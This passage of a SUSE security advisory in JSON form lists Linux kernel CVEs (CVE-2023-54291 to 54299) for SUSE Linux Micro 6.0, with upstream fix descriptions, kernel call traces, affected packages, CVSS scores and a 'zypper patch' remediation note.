memcpy_orig+0xc5/0x130\n[ 4761.115126] vduse_vdpa_set_vq_affinity+0x3e/0x50 [vduse]\n[ 4761.120533] virtnet_clean_affinity.part.0+0x3d/0x90 [virtio_net]\n[ 4761.126635] remove_vq_common+0x1a4/0x250 [virtio_net]\n[ 4761.131781] virtnet_remove+0x5d/0x70 [virtio_net]\n[ 4761.136580] virtio_dev_remove+0x3a/0x90\n[ 4761.140509] device_release_driver_internal+0x19b/0x200\n[ 4761.145742] bus_remove_device+0xc2/0x130\n[ 4761.149755] device_del+0x158/0x3e0\n[ 4761.153245] ? kernfs_find_ns+0x35/0xc0\n[ 4761.157086] device_unregister+0x13/0x60\n[ 4761.161010] unregister_virtio_device+0x11/0x20\n[ 4761.165543] device_release_driver_internal+0x19b/0x200\n[ 4761.170770] bus_remove_device+0xc2/0x130\n[ 4761.174782] device_del+0x158/0x3e0\n[ 4761.178276] ? __pfx_vdpa_name_match+0x10/0x10 [vdpa]\n[ 4761.183336] device_unregister+0x13/0x60\n[ 4761.187260] vdpa_nl_cmd_dev_del_set_doit+0x63/0xe0 [vdpa]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54291",
"url": "https://www.suse.com/security/cve/CVE-2023-54291"
},
{
"category": "external",
"summary": "SUSE Bug 1255798 for CVE-2023-54291",
"url": "https://bugzilla.suse.com/1255798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54291"
},
{
"cve": "CVE-2023-54292",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54292"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: Fix data race on CQP request done\n\nKCSAN detects a data race on cqp_request-\u003erequest_done memory location\nwhich is accessed locklessly in irdma_handle_cqp_op while being\nupdated in irdma_cqp_ce_handler.\n\nAnnotate lockless intent with READ_ONCE/WRITE_ONCE to avoid any\ncompiler optimizations like load fusing and/or KCSAN warning.\n\n[222808.417128] BUG: KCSAN: data-race in irdma_cqp_ce_handler [irdma] / irdma_wait_event [irdma]\n\n[222808.417532] write to 0xffff8e44107019dc of 1 bytes by task 29658 on cpu 5:\n[222808.417610] irdma_cqp_ce_handler+0x21e/0x270 [irdma]\n[222808.417725] cqp_compl_worker+0x1b/0x20 [irdma]\n[222808.417827] process_one_work+0x4d1/0xa40\n[222808.417835] worker_thread+0x319/0x700\n[222808.417842] kthread+0x180/0x1b0\n[222808.417852] ret_from_fork+0x22/0x30\n\n[222808.417918] read to 0xffff8e44107019dc of 1 bytes by task 29688 on cpu 1:\n[222808.417995] irdma_wait_event+0x1e2/0x2c0 [irdma]\n[222808.418099] irdma_handle_cqp_op+0xae/0x170 [irdma]\n[222808.418202] irdma_cqp_cq_destroy_cmd+0x70/0x90 [irdma]\n[222808.418308] irdma_puda_dele_rsrc+0x46d/0x4d0 [irdma]\n[222808.418411] irdma_rt_deinit_hw+0x179/0x1d0 [irdma]\n[222808.418514] irdma_ib_dealloc_device+0x11/0x40 [irdma]\n[222808.418618] ib_dealloc_device+0x2a/0x120 [ib_core]\n[222808.418823] __ib_unregister_device+0xde/0x100 [ib_core]\n[222808.418981] ib_unregister_device+0x22/0x40 [ib_core]\n[222808.419142] irdma_ib_unregister_device+0x70/0x90 [irdma]\n[222808.419248] i40iw_close+0x6f/0xc0 [irdma]\n[222808.419352] i40e_client_device_unregister+0x14a/0x180 [i40e]\n[222808.419450] i40iw_remove+0x21/0x30 [irdma]\n[222808.419554] auxiliary_bus_remove+0x31/0x50\n[222808.419563] device_remove+0x69/0xb0\n[222808.419572] device_release_driver_internal+0x293/0x360\n[222808.419582] driver_detach+0x7c/0xf0\n[222808.419592] bus_remove_driver+0x8c/0x150\n[222808.419600] driver_unregister+0x45/0x70\n[222808.419610] auxiliary_driver_unregister+0x16/0x30\n[222808.419618] irdma_exit_module+0x18/0x1e [irdma]\n[222808.419733] __do_sys_delete_module.constprop.0+0x1e2/0x310\n[222808.419745] __x64_sys_delete_module+0x1b/0x30\n[222808.419755] do_syscall_64+0x39/0x90\n[222808.419763] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n[222808.419829] value changed: 0x01 -\u003e 0x03",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54292",
"url": "https://www.suse.com/security/cve/CVE-2023-54292"
},
{
"category": "external",
"summary": "SUSE Bug 1255800 for CVE-2023-54292",
"url": "https://bugzilla.suse.com/1255800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54292"
},
{
"cve": "CVE-2023-54293",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54293"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbcache: fixup btree_cache_wait list damage\n\nWe get a kernel crash about \"list_add corruption. next-\u003eprev should be\nprev (ffff9c801bc01210), but was ffff9c77b688237c.\n(next=ffffae586d8afe68).\"\n\ncrash\u003e struct list_head 0xffff9c801bc01210\nstruct list_head {\n next = 0xffffae586d8afe68,\n prev = 0xffffae586d8afe68\n}\ncrash\u003e struct list_head 0xffff9c77b688237c\nstruct list_head {\n next = 0x0,\n prev = 0x0\n}\ncrash\u003e struct list_head 0xffffae586d8afe68\nstruct list_head struct: invalid kernel virtual address: ffffae586d8afe68 type: \"gdb_readmem_callback\"\nCannot access memory at address 0xffffae586d8afe68\n\n[230469.019492] Call Trace:\n[230469.032041] prepare_to_wait+0x8a/0xb0\n[230469.044363] ? bch_btree_keys_free+0x6c/0xc0 [escache]\n[230469.056533] mca_cannibalize_lock+0x72/0x90 [escache]\n[230469.068788] mca_alloc+0x2ae/0x450 [escache]\n[230469.080790] bch_btree_node_get+0x136/0x2d0 [escache]\n[230469.092681] bch_btree_check_thread+0x1e1/0x260 [escache]\n[230469.104382] ? finish_wait+0x80/0x80\n[230469.115884] ? bch_btree_check_recurse+0x1a0/0x1a0 [escache]\n[230469.127259] kthread+0x112/0x130\n[230469.138448] ? kthread_flush_work_fn+0x10/0x10\n[230469.149477] ret_from_fork+0x35/0x40\n\nbch_btree_check_thread() and bch_dirty_init_thread() may call\nmca_cannibalize() to cannibalize other cached btree nodes. Only one thread\ncan do it at a time, so the op of other threads will be added to the\nbtree_cache_wait list.\n\nWe must call finish_wait() to remove op from btree_cache_wait before free\nit\u0027s memory address. Otherwise, the list will be damaged. Also should call\nbch_cannibalize_unlock() to release the btree_cache_alloc_lock and wake_up\nother waiters.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54293",
"url": "https://www.suse.com/security/cve/CVE-2023-54293"
},
{
"category": "external",
"summary": "SUSE Bug 1255801 for CVE-2023-54293",
"url": "https://bugzilla.suse.com/1255801"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54293"
},
{
"cve": "CVE-2023-54296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: SVM: Get source vCPUs from source VM for SEV-ES intrahost migration\n\nFix a goof where KVM tries to grab source vCPUs from the destination VM\nwhen doing intrahost migration. Grabbing the wrong vCPU not only hoses\nthe guest, it also crashes the host due to the VMSA pointer being left\nNULL.\n\n BUG: unable to handle page fault for address: ffffe38687000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 [#1] SMP NOPTI\n CPU: 39 PID: 17143 Comm: sev_migrate_tes Tainted: GO 6.5.0-smp--fff2e47e6c3b-next #151\n Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.28.0 07/10/2023\n RIP: 0010:__free_pages+0x15/0xd0\n RSP: 0018:ffff923fcf6e3c78 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffffe38687000000 RCX: 0000000000000100\n RDX: 0000000000000100 RSI: 0000000000000000 RDI: ffffe38687000000\n RBP: ffff923fcf6e3c88 R08: ffff923fcafb0000 R09: 0000000000000000\n R10: 0000000000000000 R11: ffffffff83619b90 R12: ffff923fa9540000\n R13: 0000000000080007 R14: ffff923f6d35d000 R15: 0000000000000000\n FS: 0000000000000000(0000) GS:ffff929d0d7c0000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: ffffe38687000000 CR3: 0000005224c34005 CR4: 0000000000770ee0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n sev_free_vcpu+0xcb/0x110 [kvm_amd]\n svm_vcpu_free+0x75/0xf0 [kvm_amd]\n kvm_arch_vcpu_destroy+0x36/0x140 [kvm]\n kvm_destroy_vcpus+0x67/0x100 [kvm]\n kvm_arch_destroy_vm+0x161/0x1d0 [kvm]\n kvm_put_kvm+0x276/0x560 [kvm]\n kvm_vm_release+0x25/0x30 [kvm]\n __fput+0x106/0x280\n ____fput+0x12/0x20\n task_work_run+0x86/0xb0\n do_exit+0x2e3/0x9c0\n do_group_exit+0xb1/0xc0\n __x64_sys_exit_group+0x1b/0x20\n do_syscall_64+0x41/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n \u003c/TASK\u003e\n CR2: ffffe38687000000",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54296",
"url": "https://www.suse.com/security/cve/CVE-2023-54296"
},
{
"category": "external",
"summary": "SUSE Bug 1255793 for CVE-2023-54296",
"url": "https://bugzilla.suse.com/1255793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54296"
},
{
"cve": "CVE-2023-54297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: zoned: fix memory leak after finding block group with super blocks\n\nAt exclude_super_stripes(), if we happen to find a block group that has\nsuper blocks mapped to it and we are on a zoned filesystem, we error out\nas this is not supposed to happen, indicating either a bug or maybe some\nmemory corruption for example. However we are exiting the function without\nfreeing the memory allocated for the logical address of the super blocks.\nFix this by freeing the logical address.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54297",
"url": "https://www.suse.com/security/cve/CVE-2023-54297"
},
{
"category": "external",
"summary": "SUSE Bug 1255795 for CVE-2023-54297",
"url": "https://bugzilla.suse.com/1255795"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54297"
},
{
"cve": "CVE-2023-54299",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54299"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: bus: verify partner exists in typec_altmode_attention\n\nSome usb hubs will negotiate DisplayPort Alt mode with the device\nbut will then negotiate a data role swap after entering the alt\nmode. The data role swap causes the device to unregister all alt\nmodes, however the usb hub will still send Attention messages\neven after failing to reregister the Alt Mode. type_altmode_attention\ncurrently does not verify whether or not a device\u0027s altmode partner\nexists, which results in a NULL pointer error when dereferencing\nthe typec_altmode and typec_altmode_ops belonging to the altmode\npartner.\n\nVerify the presence of a device\u0027s altmode partner before sending\nthe Attention message to the Alt Mode driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54299",
"url": "https://www.suse.com/security/cve/CVE-2023-54299"
},
{
"category": "external",
"summary": "SUSE Bug 1255789 for CVE-2023-54299",
"url": "https://bugzilla.suse.com/1255789"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
